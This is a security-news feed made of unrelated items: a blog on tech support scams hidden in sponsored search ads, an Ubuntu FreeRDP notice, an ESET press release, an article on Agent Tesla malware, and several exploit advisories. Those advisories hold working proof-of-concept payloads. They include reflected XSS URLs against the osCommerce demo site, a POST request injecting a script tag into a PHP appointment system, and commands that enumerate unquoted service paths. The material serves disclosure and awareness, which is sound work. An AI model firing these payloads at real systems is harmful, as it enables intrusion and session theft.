Our researchers found fake sponsored search results that lead consumers to a typical fake Microsoft alert site set up by tech support scammers.

_This blog post was written based on research carried out by Jérôme Segura._

A campaign using sponsored search results is targeting home users and taking them to tech support scams.

Sponsored search results are the ones that are listed at the top of search results and are labelled “Sponsored”. They’re often ads that are taken out by brands who want to get people to click through to their website. In the case of malicious sponsored ads, scammers tend to outbid the brands in order to be listed as the first search result.

The criminals that buy the ads will go as far as displaying the official brand’s website within the ad snippet, making it hard for an unsuspecting visitor to notice a difference.

Who would, for example, be able to spot that the below ad for CNN is not legitimate. You’ll have to click on the three dots (in front of where we added malicious ad) and look at the advertiser information to see that it’s not the legitimate owner of the brand.

Only then it becomes apparent that the real advertiser is not CNN, but instead a company called Yojoy Network Technology Co., Limited.

Below, you can see another fake advertisement by the same advertiser, this time impersonating Amazon.

In our example, the scammers failed to use the correct CNN or Amazon icons, but in other cases (like another recent discovery by Jerome Segura), scammers have even used the correct icon.

The systems of the people that click one of these links are likely to assessed on what the most profitable follow-up is (using a method called fingerprinting). For systems running Windows, we found visitors are redirected to tech support scam websites such as this one.

_Tech Support Scam site telling the visitor to call 1-844-476-5780_

You undoubtedly know the type. Endless pop-ups, soundbites, and prompts telling the visitor that they should urgently call the displayed number to free their system of alleged malware.

These tech support scammers will impersonate legitimate software companies (i.e. Microsoft) and charge their victims hundreds or even thousands of dollars for completely bogus malware removal.

**Getting help if you have been scammed**

Getting scammed is one of the worst feelings to experience. In many ways, you may feel like you have been violated and angry to have let your guard down. Perhaps you are even shocked and scared, and don’t really know what to do now. The following tips will hopefully provide you with some guidance.

**If you’ve already let the scammers in**

*   Revoke any remote access the scammer has (if you are unsure, restart your computer). That should cut the remote session and kick them out of your computer.
*   Scan your computer for malware. The miscreants may have installed password stealers or other Trojans to capture your keystrokes. Use a program such as Malwarebytes to quickly identify and remove threats.
*   Change all your passwords. (Windows password, email, banking, etc.)

**If you’ve already paid**

*   Contact your financial institution/credit card company to reverse the charges and keep an eye out for future unwanted charges.
*   If you gave them personal information such as date of birth, Social Security Number, full address, name, and maiden name, you may want to look at some form of identity theft protection.

****Reporting the scam****

**File a report**

*   In the US: File a complaint (FTC)
*   In Canada: Contact law enforcement
*   In the UK: Report fraud | Report a cold call
*   In Australia: Report a scam

**Shut down their remote software account**

*   Write down the TeamViewer ID (9-digit code) and send it to TeamViewer’s support. They can later use the information you provide to block people/companies.
*   LogMeIn: Report abuse

**Spread the word**

You can raise awareness by letting your friends, family, and other acquaintances know what happened to you. Although sharing your experience of falling victim to these scams may be embarrassing, educating other people will help someone caught in a similar situation and deter further scam attempts.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

 Watch out for tech support scams lurking in sponsored search results 

Proof of concept code that demonstrates how the Windows kernel suffers from a privilege escalation vulnerability due to a double-fetch in PspBuildCreateProcessContext that leads to a stack buffer overflow.

Windows PspBuildCreateProcessContext Double-Fetch / Buffer Overflow

Proof of concept code that demonstrates how the Windows kernel suffers from a privilege escalation vulnerability due to a double-fetch in NtQueryInformationThread that leads to an arbitrary write.

Windows NtQueryInformationThread Double-Fetch / Arbitrary Write

This is the full Windows privilege escalation exploit produced from the blog Exploiting the NT Kernel in 24H2: New Bugs in Old Code and Side Channels Against KASLR.

undefinedExploiting The NT Kernel In 24H2undefined

osCommerce version 4 suffers from a cross site scripting vulnerability. Original discovery of cross site scripting in this version is attributed to CraCkEr in November of 2023.

    # Exploit Title: osCommerce 4 - Reflected XSS# Exploit Author: skalvin# Date: 22/04/2024# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/furniture/# Tested on: Windows 11 Pro# Impact: Manipulate the content of the site# CVE: CVE-2024-4348# VDB: VDB-262488# CWE: CWE-79 / CWE-74 / CWE-707# CAPEC: CAPEC-10 / CAPEC-209 / CAPEC-250# ATT&CK: T1059.007## DescriptionAttacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsGET parameter 'cat' is vulnerable to RXSSPath: /furniture/catalog/all-productshttps://demo.oscommerce.com/furniture/catalog/all-products?cat=[XSS]https://demo.oscommerce.com/watch/catalog/all-products?cat=[XSS]## Live POC:https://demo.oscommerce.com/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1https://demo.oscommerce.com/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1[-] Done

osCommerce 4 Cross Site Scripting

Ubuntu Security Notice 6759-1 - It was discovered that FreeRDP incorrectly handled certain memory operations. If a user were tricked into connecting to a malicious server, a remote attacker could possibly use this issue to cause FreeRDP to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6759-1April 29, 2024freerdp3 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in FreeRDP.Software Description:- freerdp3: RDP client for Windows Terminal ServicesDetails:It was discovered that FreeRDP incorrectly handled certain memoryoperations. If a user were tricked into connecting to a malicious server, aremote attacker could possibly use this issue to cause FreeRDP to crash,resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   libfreerdp3-3                   3.5.1+dfsg1-0ubuntu1After a standard system update you need to restart your session to make allthe necessary changes.References:   https://ubuntu.com/security/notices/USN-6759-1   CVE-2024-32658, CVE-2024-32659, CVE-2024-32660, CVE-2024-32661,   CVE-2024-32662Package Information:   https://launchpad.net/ubuntu/+source/freerdp3/3.5.1+dfsg1-0ubuntu1

Ubuntu Security Notice USN-6759-1

PRESS RELEASE

SAN DIEGO, April 29, 2024/PRNewswire/ -- ESET, a global leader in cybersecurity solutions, today announced the launch of two new Managed Detection and Response (MDR) subscription tiers: ESET PROTECT MDR for small and medium businesses (SMBs) and ESET PROTECT MDR Ultimate for enterprises. These offerings are built on the foundation of ESET PROTECT Elite and ESET PROTECT Enterprise, offering businesses of all sizes the most comprehensive, AI-powered threat detection and response capabilities, in combination with expert human analysis and comprehensive threat intelligence.

ESET's MDR offerings are designed to cater to the specific needs of both SMBs and Enterprises. To that end, ESET PROTECT MDR delivers a comprehensive cybersecurity package, offering 24/7/365 superior protection that addresses the most common challenges of small and medium-sized businesses. This includes modern protection for endpoints, email, and cloud applications, vulnerability detection and patching, and managed threat monitoring, hunting, and response. It addresses the cybersecurity talent shortages and ensures compliance with cyber insurance and regulations, offering a remarkable 20-minute average time to detect and respond, a comprehensive MDR dedicated dashboard and regular reporting for complete peace of mind.

For enterprises, ESET PROTECT MDR Ultimate offers continuous proactive protection and enhanced visibility, coupled with customized threat hunting and remote digital forensic incident response assistance. This comprehensive service is designed to support overstretched SOC teams, providing them with 24/7 access to world-class cybersecurity expertise. It ensures enterprises stay one step ahead of all known and emerging threats, effectively closing the cybersecurity skills gap, and facilitating expert consultations for incident management and containment in a fully managed experience.

ESET also sets itself apart with its own telemetry and unique global coverage, leveraging its detections and ESET Research to gather unique data about attacks, a competitive edge not offered by many players in the market.

"With the update of our business offering, we want to make ESET products accessible to customers without the necessary skill set or resources to operate them, but to also empower organizations to navigate the digital landscape confidently, safeguarded by our expertise and continuous, comprehensive coverage," stated Michal Jankech, Vice President of SMB and MSP segment at ESET.

Enhancements to the ESET business portfolio

Additionally, all ESET PROTECT subscription tiers, starting from ESET PROTECT Advanced, are now enhanced with ESET Mobile Threat Defense (EMTD). This new value-added, standalone module extends attack vector coverage to an organization's entire mobile fleet, seamlessly integrating into the ESET PROTECT Platform for efficient management, ensuring comprehensive protection for mobile devices. EMTD also includes a Mobile Device Management (MDM) functionality, with added support for Microsoft Entra ID.

Moreover, ESET Server Security introduces a firewall specifically designed for Windows servers, and Vulnerability & Patch Management, offering manual patch management and a 60-second delay of application process kill.

Finally, ESET LiveGuard Advanced now also offers advanced behavioral reports for our detection and response customers, providing an in-depth look into how our cloud sandboxing technology analyzes suspicious files, offering better visibility and context for security operators like cybersecurity and threat analysts, security engineers, or threat responders.

"This significant launch underscores ESET's unwavering dedication to delivering superior protection and services, effectively responding to the dynamic challenges faced by customers to stay one step ahead of threats," added Michal Jankech, Vice President of SMB and MSP segment at ESET.

For more detailed information about ESET and its updated portfolio, please visit the dedicated offering pages for SMBs and Enterprises.

About ESET  
ESET provides cutting-edge digital security to prevent attacks before they happen. By combining the power of AI and human expertise, ESET stays ahead of known and emerging cyber threats — securing businesses, critical infrastructure, and individuals. Whether it's endpoint, cloud or mobile protection, its AI-native, cloud-first solutions and services remain highly effective and easy to use. ESET technology includes robust detection and response, ultra-secure encryption, and multi-factor authentication. With 24/7 real-time defense and strong local support, we keep users safe and businesses running without interruption. An ever-evolving digital landscape demands a progressive approach to security: ESET is committed to world-class research and powerful threat intelligence, backed by R&D centers and a strong global partner network. For more information, visit www.eset.com or follow us on LinkedIn, Facebook, and X.

ESET PROTECT Portfolio Now Includes New MDR Tiers and Features

Doctor Appointment Management System version 1.0 suffers from a cross site scripting vulnerability.

# Application Name: Doctor Appointment Management System  
# Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/)  
# Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/)  
# BuG: XsS  
# BUG_Author: SoSPiro  
# Version: 1.0  
# CVE: CVE-2024-4293

### Vulnerable code section:

- `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php`  
- **`Lines 57-61`**

- Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']`

 ```php  
<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];  
?>  
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>

```  
- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

### Vulnerability Description:

- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.

### Proof of Concept (PoC)

- Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing)

- Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing)

```http

POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 60  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php  
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-PwnFox-Color: blue

fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=

```

- In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field:

`<script>alert(1)</script>`

- Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited.

### Impact:

- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.

### Reproduce:

- [ -vuldb.com- ](https://vuldb.com/?id.262225)

- [  -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293)

- [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md)

- [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)

Doctor Appointment Management System 1.0 Cross Site Scripting

ESET NOD32 Antivirus version 17.1.11.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET NOD32 Antivirus 17.1.11.0 - Unquoted Service Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2024-04-27# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# Vendor : https://www.eset.com# Version : 17.1.11.0# Tested on OS: Microsoft Windows 10 pro x64About Unquoted Service Path :==============================When a service is created whose executable path contains spaces and isn'tenclosed within quotes, leads to a vulnerability known as Unquoted ServicePath which allows a user to gain SYSTEM privileges.(only if the vulnerable service is running with SYSTEM privilege levelwhich most of the time it is).C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows\\" |findstr /i /v """ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESETSecurity\ekrn.exeC:\>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

By Deeba Ahmed
Beware! Agent Tesla & Taskun Malware are targeting US Education & Gov. This cyberattack steals data & exploits vulnerabilities. Learn how to protect schools & government agencies from this double threat!
This is a post from HackRead.com Read the original post: Agent Tesla and Taskun Malware Targeting US Education and Govt Entities

A new wave of cyberattacks has set its sights on the sensitive data within the US education and government sectors, discovered cybersecurity researchers at the cybersecurity platform, Veriti. This campaign leverages a combination of two malware strains: Agent Tesla and Taskun.

****Agent Tesla and Taskun- The Deceptive Duo****

Agent Tesla is an infamous malware and sophisticated spyware, designed to steal a user’s most valuable data. The malware is known for capturing keystrokes, screenshots, and even login credentials for various applications including browsers and VPNs. With this stolen information, attackers gain unauthorized access to user’s accounts and potentially sensitive systems.

On the other hand, according to Veriti’s blog post, Taskun serves as the perfect accomplice for Agent Tesla’s malicious activities. It works by compromising a system’s integrity, creating a backdoor for Agent Tesla to infiltrate and establish persistence. This allows Agent Tesla to remain undetected for extended periods, deepening its hold on the system and maximizing data theft.

It’s important to highlight that Taskun and Agent Tesla were recently discovered as accomplices in a similar campaign. Researchers observed TicTacToe Dropper targeting Windows devices, subsequently infecting them with Leonem, AgentTesla, SnakeLogger, LokiBot, Remcos, RemLoader, Sabsik, Taskun, Androm, and Upatre.

****Attackers’ Calculated Approach****

As for the latest, campaign, the attack is launched through malicious email attachments exploiting vulnerabilities in Windows OS software like Microsoft Office, one of the most exploited software in malware attacks.

The attackers’ strategy centers around performing reconnaissance to identify vulnerabilities within the targeted systems. This approach often exploits weaknesses in commonly used office applications and operating systems. By targeting these widespread vulnerabilities, the attackers can maximize the impact of their attack, potentially compromising a vast number of devices within an organization.

Phishing emails as observed by Veriti

****Why Education and Government Sectors are Vulnerable****

Educational institutions and government agencies often hold a treasure trove of sensitive data, making them prime targets for cybercriminals. This data can include student records, research findings, social security numbers, and other confidential information.

Moreover, schools have been identified as highly lucrative targets for cybercriminals. Both in the past and recently, hackers have targeted over 900 schools in the United States by exploiting the notorious MOVEit vulnerability.

A successful attack using Agent Tesla and Taskun could result in a significant data breach, causing immense financial loss, reputational damage, and even identity theft for affected individuals.

****How to Fight Back?****

Institutions can strengthen their cybersecurity defences against cyber threats by applying security patches promptly, educating users on cybersecurity awareness, and implementing a multi-layered security approach. Regularly patching vulnerabilities, providing cybersecurity awareness training, and implementing a multi-layered security approach can help protect sensitive data.

1.  Microsoft Outlook Flaw Exploited by Russian Forest Blizzard
2.  Retired Software Exploited To Target Power Grids, Microsoft
3.  Microsoft Teams Flaw Sends Malware to Employees’ Inboxes
4.  Researchers Warn of New Microsoft Office 0-Day Flaw Follina
5.  NodeStealer Mimics ‘Microsoft’ to Hack Facebook, Browser Data

Tag

#windows